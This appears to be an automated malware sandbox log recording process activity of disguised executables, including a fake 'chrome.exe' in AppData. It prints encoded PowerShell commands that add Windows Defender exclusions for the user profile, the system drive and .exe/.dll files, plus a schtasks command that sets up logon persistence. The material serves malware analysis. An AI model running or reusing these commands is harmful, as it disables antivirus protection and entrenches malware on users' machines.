Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exitJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,39_2_0000000140001F00
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,39_2_0000000140001F00
Source: C:\Users\user\AppData\Roaming\34432.exeQueries volume information: C:\Users\user\AppData\Roaming\34432.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
